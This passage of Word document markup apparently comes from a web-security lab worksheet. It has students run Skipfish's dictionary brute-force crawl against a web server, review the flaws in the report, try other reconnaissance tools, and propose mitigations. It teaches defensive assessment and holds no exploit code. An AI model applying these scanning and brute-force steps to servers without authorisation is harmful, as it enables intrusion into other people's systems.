        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1972" w:right="1435"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>(Kindly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>note:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Here</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/home/Desktop/skiout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>anything</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>set based on your system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>settings)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4DF2E1" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1973"/>
        </w:tabs>
        <w:ind w:right="1438"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Skipfish now does a brute-force attack on the web server with the help of complete.wl, which is a dictionary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6B5105" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1973"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:right="1437"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>It will create a directory skiout in the specified location and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the output will be stored in the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430FF7E5" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1973"/>
        </w:tabs>
        <w:ind w:right="1436"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>By opening the html file, you could see the crawl output displaying with various flaws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5E62E" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1973"/>
        </w:tabs>
        <w:ind w:hanging="282"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Look into the entire output and analyze the flaws in the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>webserver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357C5252" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1973"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="DADADA"/>
        </w:rPr>
        <w:t xml:space="preserve">List out the flaws </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:shd w:val="clear" w:color="auto" w:fill="DADADA"/>
        </w:rPr>
        <w:t xml:space="preserve">you </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="DADADA"/>
        </w:rPr>
        <w:t>have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:shd w:val="clear" w:color="auto" w:fill="DADADA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="DADADA"/>
        </w:rPr>
        <w:t>identified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6EE4EF" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22519A2A" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:spacing w:before="93"/>
        <w:ind w:left="1972" w:right="1616"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>Hint: Click the various issues listed and observe the details. For more</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>information use show trace to get further details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F94021E" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C220FF7" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="3"/>
        <w:ind w:left="840" w:right="1436" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reflection: Use other tools to perform webserver reconnaissance, </w:t>
      </w:r>
      <w:r>
        <w:t>fingerprinting, footprinting on the same site and record your reflec</w:t>
      </w:r>
      <w:r>
        <w:t>tion on the other</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>flaws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>identified.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Propose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>steps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>patches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>secure your webserver from these</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CB531F" w14:textId="322A1F3E" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1663"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="052A3D4C" wp14:editId="61C3DE0A">
                <wp:extent cx="5227320" cy="701040"/>
                <wp:effectExtent l="0" t="0" r="3175" b="0"/>
                <wp:docPr id="46" name="Group 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27320" cy="701040"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8232" cy="1104"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="47" name="Freeform 33"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="8232" cy="1104"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 8232 w 8232"/>
                              <a:gd name="T1" fmla="*/ 0 h 1104"/>
                              <a:gd name="T2" fmla="*/ 0 w 8232"/>
                              <a:gd name="T3" fmla="*/ 0 h 1104"/>
                              <a:gd name="T4" fmla="*/ 0 w 8232"/>
                              <a:gd name="T5" fmla="*/ 276 h 1104"/>
                              <a:gd name="T6" fmla="*/ 0 w 8232"/>
                              <a:gd name="T7" fmla="*/ 552 h 1104"/>
                              <a:gd name="T8" fmla="*/ 0 w 8232"/>
                              <a:gd name="T9" fmla="*/ 828 h 1104"/>
                              <a:gd name="T10" fmla="*/ 0 w 8232"/>
                              <a:gd name="T11" fmla="*/ 1104 h 1104"/>
                              <a:gd name="T12" fmla="*/ 8232 w 8232"/>
                              <a:gd name="T13" fmla="*/ 1104 h 1104"/>
                              <a:gd name="T14" fmla="*/ 8232 w 8232"/>
                              <a:gd name="T15" fmla="*/ 828 h 1104"/>
                              <a:gd name="T16" fmla="*/ 8232 w 8232"/>
                              <a:gd name="T17" fmla="*/ 552 h 1104"/>
                              <a:gd name="T18" fmla="*/ 8232 w 8232"/>
                              <a:gd name="T19" fmla="*/ 276 h 1104"/>
                              <a:gd name="T20" fmla="*/ 8232 w 8232"/>
                              <a:gd name="T21" fmla="*/ 0 h 110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Lst>
                            <a:rect l="0" t="0" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="8232" h="1104">
                                <a:moveTo>
                                  <a:pt x="8232" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="276"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="828"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1104"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8232" y="1104"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8232" y="828"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8232" y="552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8232" y="276"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8232" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="DADADA"/>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8" name="Text Box 32"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="8232" cy="11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8127C5" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                              <w:pPr>
                                <w:numPr>
                                  <w:ilvl w:val="0"/>
                                  <w:numId w:val="4"/>
                                </w:numPr>
                                <w:tabs>
                                  <w:tab w:val="left" w:pos="617"/>
                                </w:tabs>
                                <w:spacing w:line="274" w:lineRule="exact"/>
                                <w:ind w:hanging="589"/>
                                <w:jc w:val="both"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:i/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:i/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>List out the tools you have used. (Other than the above</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:i/>
                                  <w:spacing w:val="-18"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:i/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>listed)</w:t>
                              </w:r>
                            </w:p>
                            <w:p w14:paraId="1DDF9C9E" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                              <w:pPr>
                                <w:numPr>
                                  <w:ilvl w:val="0"/>
                                  <w:numId w:val="4"/>
                                </w:numPr>
                                <w:tabs>
                                  <w:tab w:val="left" w:pos="617"/>
                                </w:tabs>
                                <w:ind w:left="309" w:right="23" w:hanging="281"/>
                                <w:jc w:val="both"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:i/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:i/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>Record the vulnerabilities/ flaws along with the mit</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:i/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>igations/ patches here with details of the tools used. (Use additional sheets if needed)</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0" upright="1">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="052A3D4C" id="Group 31" o:spid="_x0000_s1026" style="width:411.6pt;height:55.2pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="8232,11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arGIQAQAAL0OAAAOAAAAZHJzL2Uyb0RvYy54bWy8V+1u2zYU/T9g70DwZ4FFlmzHiRClyJIl&#10;GNBtBeo9AC1RH5gkaiRtOX363ktKCu3UsppuhQGbEo8u7z33Q8c37/dVSXZcqkLUEfUvZpTwOhZJ&#10;UWcR/Xv9+MsVJUqzOmGlqHlEn7mi729//ummbUIeiFyUCZcEjNQqbJuI5lo3oeepOOcVUxei4TVs&#10;pkJWTMOlzLxEshasV6UXzGaXXitk0kgRc6Xg7oPdpLfGfpryWP+VpoprUkYUfNPmW5rvDX57tzcs&#10;zCRr8iLu3GBv8KJiRQ2HDqYemGZkK4tXpqoilkKJVF/EovJEmhYxNzFANP7sKJonKbaNiSUL26wZ&#10;aAJqj3h6s9n4z91HSYokootLSmpWQY7MsWTuIzltk4WAeZLNp+ajtBHC8oOI/1Gw7R3v43VmwWTT&#10;/iESsMe2Whhy9qms0ASETfYmB89DDvhekxhuLoNgNQ8gVTHsrYCTRZekOIdMvnoszn/rHrwK5oF9&#10;yoeH0HePhfZE42XnFYYEpaZe2FTfx+annDXcJEkhUz2bq57NR8k51i+Zzy2hBtazqVwqnR10UgHj&#10;byNxhAsWxluln7gwmWC7D0rbHkhgZfKbdGWwhiSkVQnt8M4jaJG05qfrmQHmO7AZyUlPPzTDgIHM&#10;DKZmJ+zMDzBft7M4wHzdn6WDCVaXJzyCaj/rEeRwwCyXwQlLMOEG1KnYrh3MVXB1wpLvMn7KlO/y&#10;jVyfMuZyPpY+l/cxey73Y/Zc/kdidRMwZm5aEnw3C2Pm3Eycrg4cQENSR8wFbjLc4ofZk/UdxfK+&#10;yeJ93XUZrAjDd+TMTMZGKBxt2HIw9tZm9IIJQGFLngBDghFsxspZMGQPwctuMI5bhtwgeDUJDMwj&#10;+HoSGEsc0VDFdkKPO+J3MfrTgvS7KP1pYfpdnP60QLHGjO/TQsUaQjjUiBOqTVRXBRL0ybEykZSA&#10;MtngMyxsmMbi6ZekjShWIyU5iC18zeFOJXZ8LQxGYxVZBBxt3pxw4AugrF2gdbBH9Xv9b2OMWQx0&#10;ShdEv9v/uiiYkRNQMBMmoPq3CLjfH9X/2iOHKKcjz508mDwXyAA8x8sAPCY5LoXitiwwx0asDMnG&#10;GnFe0kqURfJYlCWmWMlsc19KsmOgaB/u8NOxeQArzeCoBT5mj8E7IISsrLAqaCOSZ5AYUlhZDDIe&#10;FrmQnylpQRJHVP27ZZJTUv5eg0q69hcgxog2F4vlCgtcujsbd4fVMZiKqKYw6HB5r63u3jayyHI4&#10;yTfVW4s70IdpgTLE+Ge96i5AqP0oxQbdbfXvGrXor2JPoNHAKeQMhB0qNqL3cL/3vNNupBb3Ocxy&#10;fielaHPOEuDK9rzzqLXzP0m6RlpJR3ARURwrhtte3kFB9RCsoaEssLcObphue1Uner/Zd0R8Y8kM&#10;5TKUCixsmcDiPywRI/HhPxL4fvAnzL02cb3867z9AgAA//8DAFBLAwQUAAYACAAAACEAutkc/dwA&#10;AAAFAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQUvDQBCF74L/YRnBm90kVSlpNqUU9VQEW0F6mybT&#10;JDQ7G7LbJP33jl708mB4j/e+yVaTbdVAvW8cG4hnESjiwpUNVwY+968PC1A+IJfYOiYDV/Kwym9v&#10;MkxLN/IHDbtQKSlhn6KBOoQu1doXNVn0M9cRi3dyvcUgZ1/pssdRym2rkyh61hYbloUaO9rUVJx3&#10;F2vgbcRxPY9fhu35tLke9k/vX9uYjLm/m9ZLUIGm8BeGH3xBh1yYju7CpVetAXkk/Kp4i2SegDpK&#10;KI4eQeeZ/k+ffwMAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAA&#10;AAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDearGIQAQAAL0OAAAOAAAA&#10;AAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQC62Rz93AAAAAUBAAAP&#10;AAAAAAAAAAAAAAAAAJoGAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAowcAAAAA&#10;">
                <v:shape id="Freeform 33" o:spid="_x0000_s1027" style="position:absolute;width:8232;height:1104;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8232,11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BMOxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gQvRTcV0RBdRYrF4qUkCnp8ZJ9JMPs2ZLea+uvdguBxmJlvmMWqM7W4Uusqywo+RhEI&#10;4tzqigsFh/3XMAbhPLLG2jIp+CMHq2XvbYGJtjdO6Zr5QgQIuwQVlN43iZQuL8mgG9mGOHhn2xr0&#10;QbaF1C3eAtzUchxFU2mw4rBQYkOfJeWX7NcouF9sNt7ER3vapu7n4NJ4876LlRr0u/UchKfOv8LP&#10;9rdWMJnB/5fwA+TyAQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAHIUEw7EAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m8232,l,,,276,,552,,828r,276l8232,1104r,-276l8232,552r,-276l8232,xe" fillcolor="#dadada" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8232,0;0,0;0,276;0,552;0,828;0,1104;8232,1104;8232,828;8232,552;8232,276;8232,0" o:connectangles="0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                  <v:stroke joinstyle="miter"/>
                  <v:path gradientshapeok="t" o:connecttype="rect"/>
                </v:shapetype>
                <v:shape id="Text Box 32" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;width:8232;height:11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IGswAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0v+B/CCN7W1EVkrUYRcUFYEGs9eBybsQ02k9pE7f57cxD2+Hjf82Vna/Gg1hvHCkbDBARx4bTh&#10;UsEx//n8BuEDssbaMSn4Iw/LRe9jjql2T87ocQiliCHsU1RQhdCkUvqiIot+6BriyF1cazFE2JZS&#10;t/iM4baWX0kykRYNx4YKG1pXVFwPd6tgdeJsY2678z67ZCbPpwn/Tq5KDfrdagYiUBf+xW/3VisY&#10;x7HxS/wBcvECAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA+PyBrMAAAADbAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="488127C5" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                        <w:pPr>
                          <w:numPr>
                            <w:ilvl w:val="0"/>
                            <w:numId w:val="4"/>
                          </w:numPr>
                          <w:tabs>
                            <w:tab w:val="left" w:pos="617"/>
                          </w:tabs>
                          <w:spacing w:line="274" w:lineRule="exact"/>
                          <w:ind w:hanging="589"/>
                          <w:jc w:val="both"/>
                          <w:rPr>
                            <w:b/>
                            <w:i/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:i/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>List out the tools you have used. (Other than the above</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:i/>
                            <w:spacing w:val="-18"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:i/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>listed)</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1DDF9C9E" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                        <w:pPr>
                          <w:numPr>
                            <w:ilvl w:val="0"/>
                            <w:numId w:val="4"/>
                          </w:numPr>
                          <w:tabs>
                            <w:tab w:val="left" w:pos="617"/>
                          </w:tabs>
                          <w:ind w:left="309" w:right="23" w:hanging="281"/>
                          <w:jc w:val="both"/>
                          <w:rPr>
                            <w:b/>
                            <w:i/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:i/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>Record the vulnerabilities/ flaws along with the mit</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:i/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>igations/ patches here with details of the tools used. (Use additional sheets if needed)</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="10407E51" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:spacing w:before="26" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1200" w:right="2319"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t xml:space="preserve">Hint: You shall use step 10 and 11 to record in your coursework too </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="E46C0A"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
